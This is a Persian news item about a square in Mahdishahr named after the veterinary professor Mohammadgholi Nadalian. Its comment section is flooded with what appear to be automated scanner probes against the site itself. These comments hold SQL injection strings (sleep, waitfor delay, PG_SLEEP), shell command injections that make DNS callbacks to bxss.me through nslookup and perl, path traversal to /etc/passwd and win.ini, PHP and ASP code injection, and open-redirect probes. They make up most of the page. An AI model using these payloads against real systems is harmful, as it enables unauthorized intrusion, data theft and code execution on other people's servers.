انتشار : 1398/05/16 بازدید : 1943

“میدان پروفسور نادعلیان” میدانی در تکریم و پاسداشت دانش

نامگذاری میدانی در شهر "مهدی‌شهر" استان سمنان به نام دکتر نادعلیان چهره ماندگار دامپزشکی کشور.

به گزارش روابط عمومی سازمان نظام دامپزشکی در این مراسم که با حضور جمعی از مسئولین و مقامات محلی، استانی و کشوری مانند رئیس سازمان نظام دامپزشکی، رئیس و برخی از اساتید دانشکده دامپزشکی دانشگاه تهران، معاون استاندار سمنان، فرماندار و شهردار مهدی‌شهر برگزار شد از میدان و سردیس "استاد دکتر محمدقلی نادعلیان" با هدف ارج نهادن به مقام شامخ علمی و عملی این استاد بازنشسته دانشگاه تهران، رونمایی شد.

🔸شایان ذکر است این میدان و سردیس نصب شده در مرکز آن به همت شهرداری و فرمانداری مهدی‌شهر (سنگسر)، شهر زادگاه استاد دکتر نادعلیان و حمایت مالی آقای فریدون کارون رئیس هیئت مدیره بنیاد حامیان دانشکده دامپزشکی دانشگاه تهران ایجاد شده است.

🔹سازمان نظام دامپزشکی جمهوری اسلامی ایران برای این استاد گرانقدر و چهره ماندگار کشور آرزوی سلامت و سعادت و توفیق و روز افزون از درگاه ایزد منان طلب می‌نماید.

 

 • پاسخ
  ارسال شده از : محسن سعیدی در تاریخ : 1398/05/20

  همت بانیان این امر زیبا ،ستودنی است.

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1 OR 2+551-551-1=0+0+0+1 --

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1 OR 3+551-551-1=0+0+0+1 --

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1 OR 3*2<(0+5+551-551) --

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1 OR 3*2>(0+5+551-551) --

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1 OR 2+151-151-1=0+0+0+1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1 OR 3+151-151-1=0+0+0+1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1 OR 3*2<(0+5+151-151)

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1 OR 3*2>(0+5+151-151)

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1' OR 2+856-856-1=0+0+0+1 --

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1' OR 3+856-856-1=0+0+0+1 --

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1' OR 3*2<(0+5+856-856) --

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1' OR 3*2>(0+5+856-856) --

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1' OR 2+800-800-1=0+0+0+1 or 'qPH226yR'='

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1' OR 3+800-800-1=0+0+0+1 or 'qPH226yR'='

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1' OR 3*2<(0+5+800-800) or 'qPH226yR'='

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1' OR 3*2>(0+5+800-800) or 'qPH226yR'='

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1" OR 2+638-638-1=0+0+0+1 --

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1" OR 3+638-638-1=0+0+0+1 --

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1" OR 3*2<(0+5+638-638) --

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1" OR 3*2>(0+5+638-638) --

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   if(now()=sysdate(),sleep(15),0)

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1; waitfor delay '0:0:15' --

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1); waitfor delay '0:0:15' --

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1)); waitfor delay '0:0:15' --

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1 waitfor delay '0:0:15' --

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   c5GlZUnw'; waitfor delay '0:0:15' --

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   response.write(9755460*9954814)

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   '+response.write(9755460*9954814)+'

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   "+response.write(9755460*9954814)+"

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   /../../../../../../../../../../windows/system32/BITSADMIN.exe

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : /../../../../../../../../../../windows/system32/BITSADMIN.exe در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   ed5exHkL

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   echo ctvtvl$()\ hxcrfl\nz^xyu||a #' &echo ctvtvl$()\ hxcrfl\nz^xyu||a #|" &echo ctvtvl$()\ hxcrfl\nz^xyu||a #

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   &echo ujngkl$()\ thylqm\nz^xyu||a #' &echo ujngkl$()\ thylqm\nz^xyu||a #|" &echo ujngkl$()\ thylqm\nz^xyu||a #

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   |echo ydtgct$()\ mcnmdb\nz^xyu||a #' |echo ydtgct$()\ mcnmdb\nz^xyu||a #|" |echo ydtgct$()\ mcnmdb\nz^xyu||a #

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   (nslookup hitwhxszrsmlfde421.bxss.me||perl -e "gethostbyname('hitwhxszrsmlfde421.bxss.me')")

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   $(nslookup hitfjykbnkric6d447.bxss.me||perl -e "gethostbyname('hitfjykbnkric6d447.bxss.me')")

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   &(nslookup hitficybwidrn0261d.bxss.me||perl -e "gethostbyname('hitficybwidrn0261d.bxss.me')")&'\"`0&(nslookup hitficybwidrn0261d.bxss.me||perl -e "gethostbyname('hitficybwidrn0261d.bxss.me')")&`'

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   |(nslookup hitlrplhsxwhtdebb3.bxss.me||perl -e "gethostbyname('hitlrplhsxwhtdebb3.bxss.me')")

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   `(nslookup hitqikzkhtkalc93bb.bxss.me||perl -e "gethostbyname('hitqikzkhtkalc93bb.bxss.me')")`

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   ../../../../../../../../../../etc/passwd

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   ../../../../../../../../../../windows/win.ini

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   ;(nslookup hitsyukuggude4b010.bxss.me||perl -e "gethostbyname('hitsyukuggude4b010.bxss.me')")|(nslookup hitsyukuggude4b010.bxss.me||perl -e "gethostbyname('hitsyukuggude4b010.bxss.me')")&(nslookup hitsyukuggude4b010.bxss.me||perl -e "gethostbyname('hitsyukuggude4b010.bxss.me')")

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   12345'"\'\");|]*{ <>�''💡

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   ../1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   ./1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   ${10000125+9999186}

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : ${9999218+9999162} در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : OevUoIw9 در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1some_inexistent_file_with_long_name.jpg

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   Http://bxss.me/t/fit.txt

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : echo pkumwh$()\ akyqut\nz^xyu||a #' &echo pkumwh$()\ akyqut\nz^xyu||a #|" &echo pkumwh$()\ akyqut\nz^xyu||a # در تاریخ : 1400/11/24

   1

  • ارسال شده از : &echo sloimv$()\ kbfalq\nz^xyu||a #' &echo sloimv$()\ kbfalq\nz^xyu||a #|" &echo sloimv$()\ kbfalq\nz^xyu||a # در تاریخ : 1400/11/24

   1

  • ارسال شده از : |echo bpthve$()\ omlwyl\nz^xyu||a #' |echo bpthve$()\ omlwyl\nz^xyu||a #|" |echo bpthve$()\ omlwyl\nz^xyu||a # در تاریخ : 1400/11/24

   1

  • ارسال شده از : (nslookup hitvqatrwrtko496a7.bxss.me||perl -e "gethostbyname('hitvqatrwrtko496a7.bxss.me')") در تاریخ : 1400/11/24

   1

  • ارسال شده از : $(nslookup hitxfnslurvum5976a.bxss.me||perl -e "gethostbyname('hitxfnslurvum5976a.bxss.me')") در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   http://bxss.me/t/fit.txt?.jpg

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   bxss.me

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : &(nslookup hityzetspgqrf1d298.bxss.me||perl -e "gethostbyname('hityzetspgqrf1d298.bxss.me')")&'\"`0&(nslookup hityzetspgqrf1d298.bxss.me||perl -e "gethostbyname('hityzetspgqrf1d298.bxss.me')")&`' در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : response.write(9136680*9687872) در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : cmJGVzVYSlQ= در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1&n939906=v945329

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw&n994864=v996390 در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : |(nslookup hitrggwfeqrvaeffdd.bxss.me||perl -e "gethostbyname('hitrggwfeqrvaeffdd.bxss.me')") در تاریخ : 1400/11/24

   1

  • ارسال شده از : `(nslookup hitzmwbtnywpy82e1f.bxss.me||perl -e "gethostbyname('hitzmwbtnywpy82e1f.bxss.me')")` در تاریخ : 1400/11/24

   1

  • ارسال شده از : '+response.write(9136680*9687872)+' در تاریخ : 1400/11/24

   1

  • ارسال شده از : "+response.write(9136680*9687872)+" در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg در تاریخ : 1400/11/24

   1

  • ارسال شده از : 1some_inexistent_file_with_long_name.jpg در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : Http://bxss.me/t/fit.txt در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : http://bxss.me/t/fit.txt?.jpg در تاریخ : 1400/11/24

   1

  • ارسال شده از : bxss.me در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : ../../../../../../../../../../etc/passwd در تاریخ : 1400/11/24

   1

  • ارسال شده از : ../../../../../../../../../../windows/win.ini در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : ../KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : ./KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   341GOJwN'); waitfor delay '0:0:15' --

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : 12345'"\'\");|]*{ <>�''💡 در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   xeqgRdmV')); waitfor delay '0:0:15' --

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -5 OR 900=(SELECT 900 FROM PG_SLEEP(15))--

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -5) OR 724=(SELECT 724 FROM PG_SLEEP(15))--

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   -1)) OR 452=(SELECT 452 FROM PG_SLEEP(15))--

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   Luj2hYUQ' OR 196=(SELECT 196 FROM PG_SLEEP(15))--

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   VGAcSw1S') OR 623=(SELECT 623 FROM PG_SLEEP(15))--

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   w5x5on6Q')) OR 963=(SELECT 963 FROM PG_SLEEP(15))--

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1'"

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1����%2527%2522

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   @@I62EN

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   )

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   !(()&&!|*|*|

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   ^(#$!@#$)(()))******

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : ) در تاریخ : 1400/11/24

   1

  • ارسال شده از : !(()&&!|*|*| در تاریخ : 1400/11/24

   1

  • ارسال شده از : ^(#$!@#$)(()))****** در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   '.gethostbyname(lc('hitsb'.'qeclozeg0614d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(67).chr(107).chr(71).'

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   ".gethostbyname(lc("hithr"."yferixgb6e061.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(72).chr(107).chr(82)."

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : '.gethostbyname(lc('hitkh'.'avzxowqs7f9b3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(76).chr(114).chr(76).' در تاریخ : 1400/11/24

   1

  • ارسال شده از : ".gethostbyname(lc("hitcc"."ihysoztf5d3bb.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(76).chr(114).chr(75)." در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   ;print(md5(31337));

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   ';print(md5(31337));$a='

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   ";print(md5(31337));$a="

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   ${@print(md5(31337))}

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   ${@print(md5(31337))}\

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   '.print(md5(31337)).'

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : ;print(md5(31337)); در تاریخ : 1400/11/24

   1

  • ارسال شده از : ';print(md5(31337));$a=' در تاریخ : 1400/11/24

   1

  • ارسال شده از : ";print(md5(31337));$a=" در تاریخ : 1400/11/24

   1

  • ارسال شده از : ${@print(md5(31337))} در تاریخ : 1400/11/24

   1

  • ارسال شده از : ${@print(md5(31337))}\ در تاریخ : 1400/11/24

   1

  • ارسال شده از : '.print(md5(31337)).' در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   HttP://bxss.me/t/xss.html?%00

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1112

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1112

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1112/.

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   bxss.me/t/xss.html?%00

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : 1112 در تاریخ : 1400/11/24

   1

  • ارسال شده از : 1112 در تاریخ : 1400/11/24

   1

  • ارسال شده از : 1112/. در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : HttP://bxss.me/t/xss.html?%00 در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   /xfs.bxss.me

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   929480

  • ارسال شده از : bxss.me/t/xss.html?%00 در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   http://xfs.bxss.me

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   //xfs.bxss.me

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   /\xfs.bxss.me

  • ارسال شده از : KfnqDuxw در تاریخ : 1400/11/24

   1

